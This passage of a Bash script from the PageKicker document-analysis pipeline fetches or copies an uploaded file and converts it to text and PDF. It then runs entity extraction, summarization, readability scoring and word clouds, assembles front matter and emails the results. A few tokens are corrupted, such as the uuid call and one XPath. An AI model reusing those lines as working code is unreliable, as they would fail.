2\n;;\n--montageurdir=*)\nmontageurdir=${1#*=}\nshift\n;;\n--passuuid)\npassuuid=$2\nshift 2\n;;\n--passuuid=*)\npassuuid=${1#*=}\nshift\n;;\n--url)\nurl=$2\nshift 2\n;;\n--url=*)\nurl=${1#*=}\nshift\n;;\n--xmldirectoryname)\nxmldirectoryname=$2\nshift 2\n;;\n--xmldirectoryname=*)\nxmldirectoryname=${1#*=}\nshift\n;;\n--xmlbasefile)\nxmlbasefile=$2\nshift 2\n;;\n--xmlbasefile=*)\nxmlbasefile=${1#*=}\nshift\n;;\n--flickr)\nflickr=$2\nshift 2\n;;\n--flickr=*)\nflickr=${1#*=}\nshift\n;;\n--frontmatter)\nfrontmatter=$2\nshift 2\n;;\n--frontmatter=*)\nfrontmatter=${1#*=}\nshift\n;;\n--backmatter)\nbackmatter=$2\nshift 2\n;;\n--backmatter=*)\nbackmatter=${1#*=}\nshift\n;;\n--cli)\ncli=$2\nshift 2\n;;\n--cli=*)\ncli=${1#*=}\nshift\n;;\n--buildtarget)\nbuildtarget=$2\nshift 2\n;;\n--buildtarget=*)\nbuildtarget=${1#*=}\nshift\n;;\n--import)\nimport=$2\nshift 2\n;;\n--import=*)\nimport=${1#*=}\nshift\n;;\n --) # End of all options\n shift\n break\n ;;\n -*)\n echo \"WARN: Unknown option (ignored): $1\" >&2\n shift\n ;;\n *) # no more options. Stop while loop\n break\n ;;\n\nesac\ndone\n\n\n# Suppose some options are required. Check that we got them.\n\nif [ ! 
\"$passuuid\" ] ; then\n\techo \"creating uuid\"\n\tuuid=$(python -c 'import uuid; print uuid.uuiddat-1()')\n\techo \"uuid is\" $uuid | tee --append $sfb_log\n\tmkdir -p -m 755 $TMPDIR$uuid\nelse\n\tuuid=$passuuid\n\techo \"received uuid \" $uuid\n\tmkdir -p -m 755 $TMPDIR$uuid\nfi\n\nmkdir -p -m 755 $TMPDIR$uuid/decrypted\n\n#$export PATH=$PATH:/opt/bitnami/java/bin\n\n#echo \"PATH is\" $PATH\n\necho \"xmldirectoryname is\" $xmldirectoryname\necho \"xmlbasename is \"$xmlbasefile\n\nif [ \"$xmldirectoryname\" ] ; then\n\txmlfilename=$xmldirectoryname/$xmlbasefile\n\nelse\n\n\techo \"no xml file specified, so using default.xml file and looking for url\"\n\txmlfilename=\"bin/dat/xml/default.xml\"\nfi\n\nsubmissionid=$(xmlstarlet sel -t -v \"/item/id\" \"$xmlfilename\")\nenvironment=$(xmlstarlet sel -t -v \"/item/environment\" \"$xmlfilename\")\necho \"environment is\" $environment\ncustomer_email=$(xmlstarlet sel -t -v \"/item/customer_email\" \"$xmlfilename\")\njobprofilename=$(xmlstarlet sel -t -v \"/item/jobprofilename\" \"$xmlfilename\")\necho \"jobprofilename is\" $jobprofilename\ncustomtitle=$(xmlstarlet sel -t -v \"/item/customtitle\" \"$xmlfilename\")\nbyline=$(xmlstarlet sel -t -v \"/item/byline\" \"$xmlfilename\")\nimprint=$(xmlstarlet sel -t -v \"/item/imprint\" \"$xmlfilename\")\nLANG=$(xmlstarlet sel -t -v \"/item/lang\" \"$xmlfilename\")\nuploaded_tat_file=$(xmlstarlet sel -t -v \"/item/uploaded_tat_file\" \"$xmlfilename\")\nwordcloud_width=$(xmlstarlet sel -t -v \"/item/wordcloud_width\" \"$xmlfilename\")\nwordcloud_height=$(xmlstarlet sel -t -v \"/item/wordcloud_height\" \"$xmlfilename\")\nwordcloud_submit=$(xmlstarlet sel -t -v \"/item/wordcloudat-d_submit\" \"$xmlfilename\")\necho \"uploaded_tat_file is\" $uploaded_tat_file | tee --append $sfb_log\ngetwiki=$(xmlstarlet sel -t -v \"/item/getwiki\" \"$xmlfilename\")\n# echo \"wordcloud_width\"=$wordcloud_width \"and height =\" $wordcloud_height\n# summarizer flags\n\n\nsummarizer_on=$(xmlstarlet sel -t -v \"/item/summarizer\" \"$xmlfilename\")\nsummary_length=$(xmlstarlet sel -t -v \"/item/summary_length\" \"$xmlfilename\")\npositive_seeds=$(xmlstarlet sel -t -v \"/item/positive_seeds\" \"$xmlfilename\")\npositive_seed_weight=$(xmlstarlet sel -t -v \"/item/positive_seed_weight\" \"$xmlfilename\")\nnegative_seeds=$(xmlstarlet sel -t -v \"/item/negative_seeds\" \"$xmlfilename\")\nnegative_seed_weight=$(xmlstarlet sel -t -v \"/item/negative_seed_weight\" \"$xmlfilename\")\nsummarizer_ngram_threshold=$(xmlstarlet sel -t -v \"/item/summarizer_ngram_threshold\" \"$xmlfilename\")\ndecimator_requested=$(xmlstarlet sel -t -v \"/item/decimator_requested\" \"$xmlfilename\")\ntldr=$(xmlstarlet sel -t -v \"/item/tldr\" \"$xmlfilename\")\nurl=$(xmlstarlet sel -t -v \"/item/url\" \"$xmlfilename\")\necho \"summarizer on is\" $summarizer_on | tee --append $sfb_log\necho \"summary length is\" $summary_length | tee --append $sfb_log\necho \"positive_seeds were\" $positive_seeds| tee --append $sfb_log\necho \"positive_seed_weight was\" $positive_seed_weight| tee --append $sfb_log\necho \"negative_seeds were\" $negative_seeds| tee --append $sfb_log\necho \"negative_seed_weight was \"$negative_seed_weight| tee --append $sfb_log\necho \"summarizer_ngram_threshold was\" $summarizer_ngram_threshold| tee --append $sfb_log\necho \"url to fetch is\" $url | tee --append $sfb_log\necho \"decimator_requested is \" $decimator_requested\nimagekeyword=$(xmlstarlet sel -t -v \"/item/imagekeyword\" \"$xmlfilename\")\n\n. 
\"$confdir\"jobprofiles/robots/\"$jobprofilename\"\".jobprofile\"\n. \"$confdir\"jobprofiles/imprints/$imprint/$imprint\".imprint\"\necho \"jobprofile is $jobprofile\"\necho \"imprint is $imprint\"\necho \"WEBFORMSXML_HOME is $WEBFORMSXML_HOME\"\n\nexport LANG\n\nif [ -n \"$url\" ] ; then\n\techo \"downloading file\" $url \" from Internet\" | tee --append $sfb_log\n\twget --tries=45 \"$url\" -O $TMPDIR$uuid/downloaded_wget_file.pdf\n\nelse\n\n\techo \"uploaded file\" $uploaded_tat_file \"from user's computer\" | tee --append $sfb_log\n\nfi\necho \"checking $decimator_requested\"\n\nif [ \"$decimator_requested\" = \"Decimator only\" ] ; then\n\tupload_tat_field_code=\"521\" # hard bound to PK magento production installation - fix\n echo $upload_tat_field_code\nelif [ \"$decimator_requested\" = \"Include Decimator\" ] ; then\n\tupload_tat_field_code=\"300\"\nelse\n\tupload_tat_field_code=\"300\"\nfi\n\na=$submissionid\nsubmissionid_base=\"${a%.*}\"\necho \"submissionid_base is\" $submissionid_base\necho \"uploaded_tat_file is \"$uploaded_tat_file\n\n\nif [ -z \"$url\" ] ; then\n\techo \"WEBFORMSHOME is\" $WEBFORMSHOME\n\n\tcp $WEBFORMSHOME$submissionid_base/$upload_tat_field_code/*/$uploaded_tat_file $TMPDIR$uuid/$uploaded_tat_file\n\tcp $WEBFORMSHOME$submissionid_base/$upload_tat_field_code/*/$uploaded_tat_file $scriptpath/scr/debug\n\nelse\n\n\techo \"renaming uploaded_tat to downloaded_wget\"\n\tuploaded_tat_file=\"downloaded_wget_file.pdf\"\n\nfi\n\n\n\nif [ \"$decimator_requested\" = \"Decimator only\" ] ; then\n\techo \"running Decimator only\"\n\tmkdir -p -m 755 $TMPDIR$uuid/decimator\n\tbin/decimator.sh --pdfinfile \"$TMPDIR$uuid/$uploaded_tat_file\" --outdir \"$TMPDIR$uuid/decimator\" --passuuid \"$uuid\" --tldr \"$tldr\"\n\tsendemail -t \"$customer_email\" \\\n\t-u \"Decimator Result\" \\\n\t-m \"PageKicker's Document Analysis Robots living on \"$MACHINE_NAME \"and using version \" $SFB_VERSION \" of the PageKicker software have analyzed your file \" $uploaded_tat_file \" in job\" $uuid \\\n \". 
The Decimator slide deck is attached here.\" \\\n\t-f \"$GMAIL_ID\" \\\n\t-cc \"$GMAIL_ID\" \\\n\t-xu \"$GMAIL_ID\" \\\n\t-xp \"$GMAIL_PASSWORD\" \\\n\t-s smtp.gmail.com:587 \\\n\t-o tls=yes \\\n\t-a $TMPDIR$uuid/slidedeck.pdf\n\n\texit 0\nelif [ \"$decimator_requested\" = \"Include Decimator\" ] ; then\n\techo \"running Decimator, then rest of TAT\"\n\tbin/decimator.sh --pdfinfile \"$TMPDIR$uuid/$uploaded_tat_file\" --outdir \"$TMPDIR$uuid/decimator\"\nelse\n\techo \"Decimator off, proceeding with TAT\"\nfi\n\n# get basename\nfilename=$(basename \"$TMPDIR$uuid/$uploaded_tat_file\")\nfilename=\"${filename%.*}\"\necho \"filename is\" $filename | tee --append $sfb_log\n# get filename extension\nrawextension=$(echo $TMPDIR$uuid/$uploaded_tat_file | sed 's/.*\\.//')\necho \"raw extension is\" $rawextension | tee --append $sfb_log\nextension=`echo \"$rawextension\" | tr '[:upper:]' '[:lower:]'`\necho \"lowercased extension is\" $extension | tee --append $sfb_log\n\n\n# make sure there are txt and pdf target files\n\nif [ \"$extension\" = \"txt\" ] ; then\n\tcp $TMPDIR$uuid/$uploaded_tat_file $TMPDIR$uuid/targetfile.txt\n\techo \"file was .txt so copied it to targetfile\"\t | tee --append $sfb_log\n\nelif [ \"$extension\" = \"mobi\" ] ; then\n\txvfb-run --auto-servernum ebook-convert $TMPDIR$uuid/$uploaded_tat_file $TMPDIR$uuid/target.pdf\n\techo \"converted mobi to pdf\" | tee --append $sfb_log\n\tpdftotext $TMPDIR$uuid/mobiconvert.pdf $TMPDIR$uuid/targetfile.txt\n\techo \"converted resulting PDF to txt\" | tee --append $sfb_log\n\nelif [ \"$extension\" = \"azw\" ] ; then\n\txvfb-run --auto-servernum ebook-convert $TMPDIR$uuid/$uploaded_tat_file $TMPDIR$uuid/target.pdf\n\techo \"converted azw to pdf\" | tee --append $sfb_log\n\tpdftotext $TMPDIR$uuid/azwconvert.pdf $TMPDIR$uuid/targetfile.txt\n\techo \"converted resulting PDF to txt\" | tee --append $sfb_log\n\nelif [ \"$extension\" = \"epub\" ] ; then\n\txvfb-run --auto-servernum ebook-convert $TMPDIR$uuid/$uploaded_tat_file $TMPDIR$uuid/target.pdf\n\techo \"converted epub to pdf\" | tee --append $sfb_log\n\txvfb-run --auto-servernum ebook-convert $TMPDIR$uuid/$uploaded_tat_file $TMPDIR$uuid/targetfile.txt\n\techo \"converted epub to txt\" | tee --append $sfb_log\n\nelif [ \"$extension\" = \"pdf\" ] ; then\n\n\tqpdf --decrypt $TMPDIR$uuid/$uploaded_tat_file $TMPDIR$uuid/decrypted/temp.pdf\n\tcp $TMPDIR$uuid/decrypted/temp.pdf $TMPDIR$uuid/$uploaded_tat_file\n\tpdftotext $TMPDIR$uuid/$uploaded_tat_file $TMPDIR$uuid/targetfile.txt\n\tcp $TMPDIR$uuid/$uploaded_tat_file $TMPDIR$uuid/target.pdf\n\techo \"ran pdftotext and copied $TMPDIR$uuid/target.pdf\" | tee --append $sfb_log\n\tls -la $TMPDIR$uuid\n\nelif [ \"$extension\" = \"md\" ] ; then\n\txvfb-run --auto-servernum ebook-convert $TMPDIR$uuid/$uploaded_tat_file $TMPDIR$uuid/target.pdf\n\techo \"converted md file to pdf\" | tee --append $sfb_log\n\txvfb-run --auto-servernum ebook-convert $TMPDIR$uuid/$uploaded_tat_file $TMPDIR$uuid/targetfile.txt\n\techo \"converted md file to txt\" | tee --append $sfb_log\n\nelse\n\techo \"unoconv debug: TMPDIR $TMPDIR$uuid/$uploaded_tat_file\"\n\techo \"unoconv debug: targetfile $TMPDIR$uuid/targetfile.txt\"\n\tunoconv -f txt $TMPDIR$uuid/$uploaded_tat_file\n\tcp $TMPDIR$uuid/$filename\".txt\" $TMPDIR$uuid/targetfile.txt\n\tunoconv -f pdf $TMPDIR$uuid/$uploaded_tat_file $TMPDIR$uuid/target.pdf\n\techo \"file was neither txt, mobi, nor PDF, so converted it to PDF using unoconv\" | tee --append $sfb_log\n\techo \"file might contain images so converted it to PDF 
for montageur\" | tee --append $sfb_log\n\techo \"debugging else\"\nfi\n\n# catch files without enough text\nwordcount=$(wc -w \"$TMPDIR$uuid/targetfile.txt\"| cut -f1 -d' ')\n\nif [[ \"$wordcount\" -lt \"100\" ]] ; then\n\techo \"converted text has $wordcount words, less than 100 so exiting\"\n\texit 0\nelse\n\techo \"converted text has $wordcount words, enough so continuing\"\n\nfi\n\nif [ \"$extension\" = \"txt\" ] ; then\n\tmontageur_success=\"1\" # exit fail\n\techo \"file was txt, no images, so skipping montageur\" | tee --append $sfb_log\nelse\n\techo \"copying working files into montageur directory\" | tee --append $sfb_log\n\tmkdir -p -m 755 $TMPDIR$uuid/montageur\n\t$scriptpath\"bin/montageur.sh\" --pdfinfile \"$TMPDIR$uuid/target.pdf\" --stopimagefolder \"$scriptpath\"userassets/oreilly/stopimages --passuuid \"$uuid\" --environment \"$environment\" --montageurdir \"montageur\" --maximages \"5\" --tmpdir \"$TMPDIR\" --stopimagefolder \"none\"\n\tmontageur_success=\"$?\"\n\tif [ \"$montageur_success\" = 1 ] ; then\n\t\techo \"montageur exited with status 1 no images found, skipping montage processing and returning to scriptpath directory\" | tee --append $sfb_log\n\telse\n\t\t# echo \"processing montages\"\n\t\tcp $TMPDIR$uuid/$montageurdir/montage.jpg $TMPDIR$uuid/montage.jpg\n\t\tcp $TMPDIR$uuid/$montageurdir/portrait*.jpg $TMPDIR$uuid\n\t\tcp $TMPDIR$uuid/montageurtopn/montagetopn.jpg $TMPDIR$uuid/montagetopn.jpg\n\t\t# make montage PDF pages\n\t\tfor i in $TMPDIR$uuid/portrait*.jpg; do\n\t\tconvert $i -density 300 -units pixelsperinch -gravity center -extent 2550x3300 \"$i\".pdf\n\t\tdone\n\t\tconvert $TMPDIR$uuid/montagetopn.jpg -density 300 -units pixelsperinch -gravity center -extent 2550x3300 $TMPDIR$uuid/montagetopn.pdf\n\t\tcd $TMPDIR$uuid ; pdftk portrait*.jpg.pdf cat output portraits.pdf; cd $scriptpath\n\tfi\n\necho \"processed montages, proceeding to text analysis\" | tee --append $sfb_log\n\nfi\n\n# convert uploaded file to markdown\n\n\"$PANDOC_BIN\" -t markdown $TMPDIR$uuid/targetfile.txt -o $TMPDIR$uuid/body.md\n\n# run acronym filter\n\n$scriptpath/bin/acronym-filter.sh --txtinfile $TMPDIR$uuid/targetfile.txt > $TMPDIR$uuid/acronyms.txt\n\n# external loop to run NER and summarizer on split file\n\nsplit -b 50000 $TMPDIR$uuid/targetfile.txt \"$TMPDIR$uuid/xtarget.\"\n\nfor file in \"$TMPDIR$uuid/xtarget.\"*\ndo\n\n\"$PYTHON27_BIN\" $scriptpath\"bin/nerv3.py\" $file $file\"_nouns.txt\" $uuid\necho \"ran nerv3 on $file\" | tee --append $sfb_log\n\"$PYTHON_BIN\" bin/PKsum.py -l \"$summary_length\" -o $file\"_summary.txt\" $file\nsed -i 's/ \\+ / /g' $file\"_summary.txt\"\ncp $file\"_summary.txt\" $file\"_pp_summary.txt\"\necho \"ran summarizer on $file\" | tee --append $sfb_log\nawk 'length>=50' $file\"_pp_summary.txt\" > $TMPDIR$uuid/awk.tmp && mv $TMPDIR$uuid/awk.tmp $file\"_pp_summary.txt\"\n#echo \"postprocessor threw away summary lines shorter than 50 characters\" | tee --append $sfb_log\nawk 'length<=4000' $file\"_pp_summary.txt\" > $TMPDIR$uuid/awk.tmp && mv $TMPDIR$uuid/awk.tmp $file\"_pp_summary.txt\"\n#echo \"postprocessor threw away summary lines longer than 4000 characters\" | tee --append $sfb_log\n#echo \"---end of summary section of 140K bytes---\" >> $file\"_pp_summary.txt\"\n#echo \"---end of summary section of 140K bytes---\" >> $file\"_summary.txt\"\ncat $file\"_pp_summary.txt\" >> $TMPDIR$uuid/pp_summary.txt\ncat $file\"_summary.txt\" >> $TMPDIR$uuid/summary.txt\n#sleep 3\ndone\nls $TMPDIR$uuid/xtarget.*nouns* > $TMPDIR$uuid/testnouns\ncat 
$TMPDIR$uuid/xtarget.*nouns* > $TMPDIR$uuid/all_nouns.txt\nsort --ignore-case $TMPDIR$uuid/all_nouns.txt | uniq > $TMPDIR$uuid/sorted_uniqs.txt\nsed -i '1i # Unique Proper Nouns and Key Terms \\n' $TMPDIR$uuid/sorted_uniqs.txt\nsed -i '2i \\' $TMPDIR$uuid/sorted_uniqs.txt\nsed -i G $TMPDIR$uuid/sorted_uniqs.txt\ncp $TMPDIR$uuid/sorted_uniqs.txt $TMPDIR$uuid/sorted_uniqs.md\nsed -i '1i # Programmatically Generated Summary \\' $TMPDIR$uuid/pp_summary.txt\nsed -i G $TMPDIR$uuid/pp_summary.txt\nsed -i '1i # Programmatically Generated Summary \\' $TMPDIR$uuid/summary.txt\nsed -i G $TMPDIR$uuid/summary.txt\n\nif [ `wc -c < $TMPDIR$uuid/pp_summary.txt` = \"0\" ] ; then\n\techo using \"unpostprocessed summary bc wc pp summary = 0\"\nelse\n\tcp $TMPDIR$uuid/pp_summary.txt $TMPDIR$uuid/summary.md\nfi\n\n# readability report\n\njava -jar lib/CmdFlesh.jar $TMPDIR$uuid/targetfile.txt > $TMPDIR$uuid/rr.txt\nsed -i 's/Averaage/Average/g' $TMPDIR$uuid/rr.txt\necho \"# Readability Report\" > $TMPDIR$uuid/rr.md\ncat $TMPDIR$uuid/rr.txt >> $TMPDIR$uuid/rr.md\ncat assets/rr_explanation.md >> $TMPDIR$uuid/rr.md\n\"$PANDOC_BIN\" $TMPDIR$uuid/rr.md -o $TMPDIR$uuid/rr.html\nsed -i G $TMPDIR$uuid/rr.md\n\n\necho \"ran readability report\" | tee --append $sfb_log\n\n# wordcloud\n\njava -jar lib/IBMcloud/ibm-word-cloud.jar -c $scriptpath\"lib/IBMcloud/examples/configuration.txt\" -h \"5100\" -w \"6600\" < $TMPDIR$uuid/targetfile.txt > $TMPDIR$uuid/wordcloudbig.png\n\njava -jar lib/IBMcloud/ibm-word-cloud.jar -c $scriptpath\"lib/IBMcloud/examples/configuration.txt\" -h \"3100\" -w \"2400\" < $TMPDIR$uuid/targetfile.txt > $TMPDIR$uuid/wc_front.png\n\necho \"built wordclouds\" | tee --append $sfb_log\n\n# build page burst\n\n#convert $TMPDIR$uuid/downloaded.pdf -thumbnail 'x300>' -border 2x2 $TMPDIR$uuid/outfile.png\n#montage $TMPDIR$uuid/outfile*.png -size 3100x2000\\> $TMPDIR$uuid/burst.png\n#convert $TMPDIR$uuid/burst.png -resize 3100x2000 $TMPDIR$uuid/big_burst.png\n\n#convert -units pixelsperinch -density 300 -background blue -fill Yellow -gravity west -size 3300x200 -font \"$toplabelfont\" -pointsize 30 label:\"Page Burst\" $TMPDIR$uuid/burst_top.png\n#convert -units pixelsperinch -density 300 -size 3300x200 xc:blue $TMPDIR$uuid/burst_bot.png\n\n#convert -units pixelsperinch -density 300 $TMPDIR$uuid/canvas.png \\\n#$TMPDIR$uuid/burst_top.png -gravity north -composite \\\n#$TMPDIR$uuid/big_burst.png -gravity center -composite \\\n#$TMPDIR$uuid/burst_bot.png -gravity south -composite \\\n#$TMPDIR$uuid/pageburst.png\n\n\n# flickr\n\nif [ \"$flickr\" = \"on\" ] ; then\n\n\tmkdir -p -m 755 $TMPDIR$uuid/flickr\n\n\tpython includes/Flickr_title_fetcher.py $TMPDIR$uuid/titles.txt $TMPDIR$uuid/flickr/\n\tpython includes/Flickr_seed_fetcher.py \"$imagekeyword\" $TMPDIR$uuid/flickr/\n\techo \"fetched Flickr images on \" $imagekeyword | tee --append $sfb_log\n\nelse\n\n\techo \"flickr search was off\" | tee --append $sfb_log\n\nfi\n\necho \"$confdir\"jobprofiles/imprints/$imprint/\"$imprintlogo\"\ncp assets/PageKicker_cmyk300dpi.png $TMPDIR$uuid/PageKicker_cmyk300dpi.png\ncp \"$confdir\"jobprofiles/imprints/$imprint/\"$imprintlogo\" $TMPDIR$uuid/$imprintlogo\n\nif [ \"$frontmatter\" = \"off\" ] ; then\n\n\techo \"not building front matter\" | tee --append $sfb_log\nelse\n\n\techo \"copyright page for this imprint is\" $imprintcopyrightpage\n\tcp \"$confdir\"jobprofiles/imprints/$imprint/$imprintcopyrightpage $TMPDIR$uuid/$imprintcopyrightpage\n\t# save reports as PDFs\n\n\t\"$PANDOC_BIN\" $TMPDIR$uuid/summary.md -o 
$TMPDIR$uuid/summary.pdf --latex-engine=xelatex\n\t\"$PANDOC_BIN\" $TMPDIR$uuid/all_nouns.txt -o $TMPDIR$uuid/all_nouns.pdf --latex-engine=xelatex\n\t\"$PANDOC_BIN\" $TMPDIR$uuid/$imprintcopyrightpage -o $TMPDIR$uuid/copyright_notice.pdf --latex-engine=xelatex\n\t\"$PANDOC_BIN\" $TMPDIR$uuid/rr.md -o $TMPDIR$uuid/rr.pdf --latex-engine=xelatex\n\t\"$PANDOC_BIN\" $TMPDIR$uuid/sorted_uniqs.txt -o $TMPDIR$uuid/sorted_uniqs.pdf --latex-engine=xelatex\n\n# build wordcloud page\n\n\n\tconvert -size 2550x3300 xc:white $TMPDIR$uuid/wc_canvas.jpg\n\tconvert $TMPDIR$uuid/wc_canvas.jpg $TMPDIR$uuid/wc_front.png -resize 2550x3300 -density 300 -gravity center -composite $TMPDIR$uuid/wordcloud.pdf\n\n\techo \"about to build title page\"\n# (PageKicker_cmyk300dpi.png)\n\techo \"# \"$customtitle > $TMPDIR$uuid/titlepage.md\n\techo \"# \"$editedby >> $TMPDIR$uuid/titlepage.md\n\techo \"# Enhanced with Text Analytics by PageKicker Robot\" $jobprofilename >> $TMPDIR$uuid/titlepage.md\n\n\tif [ -z ${tldr+x} ];\n\t\tthen echo \"tldr is unset\"\n\telse\n\t\techo \"# \" 'TL;DR:' \"$tldr\" >> $TMPDIR$uuid/titlepage.md\n\tfi\n\n\techo '![imprint logo]'\"($imprintlogo)\"'\\' >> $TMPDIR$uuid/titlepage.md\n\techo '\\pagenumbering{roman}' >> $TMPDIR$uuid/titlepage.md\n\techo '\\newpage' >> $TMPDIR$uuid/titlepage.md\n\t# build \"also by this Robot Author\"\n\techo \" \" >> $TMPDIR$uuid/titlepage.md\n\techo \" \" >> $TMPDIR$uuid/titlepage.md\n\techo \"# Also by PageKicker Robot\" $lastname >> $TMPDIR$uuid/titlepage.md\n\tcat $LOCAL_DATA/bibliography/robots/$jobprofilename/$jobprofilename\"_titles.txt\" >> $TMPDIR$uuid/titlepage.md\n\techo \" \" >> $TMPDIR$uuid/titlepage.md\n\techo \" \" >> $TMPDIR$uuid/titlepage.md\n\tcd $TMPDIR$uuid\n\t\"$PANDOC_BIN\" $TMPDIR$uuid/titlepage.md -o $TMPDIR$uuid/titlepage.pdf --variable fontsize=12pt --latex-engine=xelatex\n\tcd $scriptpath\n\n\techo \"# About the Robot Author\" > $TMPDIR$uuid/robot_author.md\n\techo \"# $lastname\" >> $TMPDIR$uuid/robot_author.md\n\tcat \"$authorbio\" >> $TMPDIR$uuid/robot_author.md\n\tcp \"$confdir\"jobprofiles/authorphotos/$authorphoto $TMPDIR$uuid\n\n\techo \"built author page\"\n\n\t# build \"Acknowledgements\"\n\n\tcp assets/acknowledgements.md $TMPDIR$uuid/acknowledgements.md\n\techo \"sigfile is\" $sigfile\n\tcp \"$confdir\"jobprofiles/signatures/$sigfile $TMPDIR$uuid\n\n\techo \" \" >> $TMPDIR$uuid/acknowledgements.md\n\techo \" \" >> $TMPDIR$uuid/acknowledgements.md\n\n\techo '![author-sig]'\"(\"$sigfile\")\" >> $TMPDIR$uuid/acknowledgements.md\n\n\techo \"built acknowledgments\"\n\n\t# assemble front matter\n\n\tcat $TMPDIR$uuid/titlepage.md assets/newpage.md $TMPDIR$uuid/$imprintcopyrightpage assets/newpage.md $TMPDIR$uuid/robot_author.md assets/newpage.md $TMPDIR$uuid/acknowledgements.md assets/newpage.md $TMPDIR$uuid/summary.md assets/newpage.md $TMPDIR$uuid/rr.md assets/newpage.md $TMPDIR$uuid/sorted_uniqs.md > $TMPDIR$uuid/textfrontmatter.md\n\tcd $TMPDIR$uuid; \"$PANDOC_BIN\" textfrontmatter.md --latex-engine=xelatex -o textfrontmatter.pdf ; cd $scriptpath\n\n\techo \"assembled front matter\"\n\n\t# add wordcloud page to front matter\n\n\n\tif [ \"$montageur_success\" = 0 ] ; then\n\n\t\tpdftk $TMPDIR$uuid/textfrontmatter.pdf $TMPDIR$uuid/wordcloud.pdf output $TMPDIR$uuid/$uuid\"_frontmatter.pdf\"\n\t# temporarily removed $TMPDIR$uuid/portraits.pdf from front matter as does not seem overly useful\n\n\telse\n\n\t\tpdftk $TMPDIR$uuid/textfrontmatter.pdf $TMPDIR$uuid/wordcloud.pdf output 
$TMPDIR$uuid/$uuid\"_frontmatter.pdf\"\n\n\tfi\n\n\techo \"appended PDF wordcloud page to PDF front matter\"\n\n\t# add front matter to complete text\n\n\t#resize uploaded file to letter size\n\n\t# gs -sDEVICE=pdfwrite -sPAPERSIZE=letter -dFIXEDMEDIA -dPDFFitPage -dCompatibilityLevel=1.4 -o $TMPDIR$uuid/lettersize_upload.pdf $TMPDIR$uuid/$uploaded_tat_file\n\tcp $TMPDIR$uuid/$uploaded_tat_file $TMPDIR$uuid/lettersize_upload.pdf\n\n pdftk $TMPDIR$uuid/$uuid\"_frontmatter.pdf\" $TMPDIR$uuid/lettersize_upload.pdf output $TMPDIR$uuid/$uuid\"_front_body.pdf\"\n\nfi\n\n\nif [ \"$backmatter\" = \"off\" ] ; then\n\techo \"not building back matter\" | tee --append $sfb_log\nelse\n\n\t# build back matter beginning with flickr\n\n\tif [ \"$flickr\" = \"on\" ] ; then\n\n\t\tcd $TMPDIR$uuid/flickr\n\t\tfor file in *.md\n\t\tdo\n\t\t cat $file >> allflickr.md\n\t\t echo '\\newpage' >> allflickr.md\n\t\t echo \"\" >> allflickr.md\n\t\tdone\n\t\tcp *.jpg ..\n\t\tcp allflickr.md ..\n\t\tcd ..\n\t\t\"$PANDOC_BIN\" -o images.pdf allflickr.md\n\t\tcd $scriptpath\n\t\techo \"converted flickr md files to pdf pages with images\" | tee --append $sfb_log\n\n\telse\n\t\techo \"didn't process flickr files\" | tee --append $sfb_log\n\tfi\nfi\n\n\nmkdir -p 755 $mediatargetpath$uuid\n\nif [ \"$montageur_success\" = 0 ] ; then\n\n\tcp $TMPDIR$uuid/montage.jpg $mediatargetpath$uuid/$sku\"montage.jpg\"\n\tcp $TMPDIR$uuid/montagetopn.jpg $mediatargetpath$uuid/$sku\"montagetopn.jpg\"\nelse\n\techo \"no montageur files to move\"\nfi\n\n# concatenate markdown files\ncat $TMPDIR$uuid/textfrontmatter.md $TMPDIR$uuid/body.md > $TMPDIR$uuid/complete.md\n\n# create metadata\n\ntwitter_announcement=\"no\"\n\nif [ \"$twitter_announcement\" = \"yes\" ] ; then\n\n echo -n \"t update \" > $TMPDIR$uuid/tcommand\n echo -n \\\" >> $TMPDIR$uuid/tcommand\n echo -n Just ran Text Analysis Tools job $uuid >> $TMPDIR$uuid/tcommand\n echo -n \\\" >> $TMPDIR$uuid/tcommand\n . $TMPDIR$uuid/tcommand\n\nelse\n echo \"no twitter announcement\" | tee --append $sfb_log\n\nfi\n\nfb_announcement=\"no\"\n\nif [ \"$fb_announcement\" = \"yes\" ] ; then\n\n cloud_delivery_root=\"$WEB_HOST\"\n cloud_delivery_path=\"magento/media/delivery/uuid/$uuid/\"\n cloud_delivery_url=$cloud_delivery_root$cloud_delivery_path\"wordcloud.jpg\"\n\n fbcmd PPOST 472605809446163 \"PageKicker Robot Igor just ran his Text Analysis Tools and created a wordcloud for $customer_name at $cloud_delivery_url\"\n\nelse\n echo \"no fb notification\" | tee --append $sfb_log\nfi\n\n\nif [ \"$montageur_success\" = 0 ] ; then\n\nsendemail -t \"$customer_email\" \\\n\t-u \"Document Analysis Tools Result\" \\\n\t-m \"PageKicker's Document Analysis Robots living on \"$MACHINE_NAME \"and using version \" $SFB_VERSION \" of the PageKicker software have analyzed your file \" $uploaded_tat_file \" in job\" $uuid \\\n \". 
A word cloud, an image montage, a list of proper nouns, a programmatic summary, a list of acronyms, and additional files are attached.\" \\\n\t-f \"$GMAIL_ID\" \\\n\t-cc \"$GMAIL_ID\" \\\n\t-xu \"$GMAIL_ID\" \\\n\t-xp \"$GMAIL_PASSWORD\" \\\n\t-s smtp.gmail.com:587 \\\n\t-o tls=yes \\\n\t-a $TMPDIR$uuid/wordcloudbig.png \\\n\t-a $TMPDIR$uuid/summary.txt \\\n\t-a $TMPDIR$uuid/pp_summary.txt \\\n\t-a $TMPDIR$uuid/all_nouns.txt \\\n\t-a $TMPDIR$uuid/acronyms.txt \\\n\t-a $logdir$uuid\"/xform_log\" \\\n\t-a $TMPDIR$uuid/rr.md \\\n\t-a $TMPDIR$uuid/montage.jpg \\\n\t-a $TMPDIR$uuid/montagetopn.jpg\n\nelse\n\nsendemail -t \"$customer_email\" \\\n\t-u \"Document Analysis Tools Result\" \\\n\t-m \"PageKicker's Document Analysis Robots living on \"$MACHINE_NAME \"and using version \" $SFB_VERSION \" of the PageKicker software have analyzed your file \" $uploaded_tat_file \" in job\" $uuid \\\n \". A word cloud, an image montage, a list of proper nouns, a list of possible acronyms and a programmatic summary, are attached.\" \\\n\t-f \"$GMAIL_ID\" \\\n\t-cc \"$GMAIL_ID\" \\\n\t-xu \"$GMAIL_ID\" \\\n\t-xp \"$GMAIL_PASSWORD\" \\\n\t-s smtp.gmail.com:587 \\\n\t-o tls=yes \\\n\t-a $TMPDIR$uuid/wordcloudbig.png \\\n\t-a $TMPDIR$uuid/summary.txt \\\n\t-a $TMPDIR$uuid/pp_summary.txt \\\n\t-a $TMPDIR$uuid/all_nouns.txt \\\n\t-a $TMPDIR$uuid/acronyms.txt \\\n\t-a $logdir$uuid/xform_log \\\n\t-a $TMPDIR$uuid/research_report.docx \\\n\t-a $TMPDIR$uuid/rr.md\n\nfi\n" }, { "alpha_fraction": 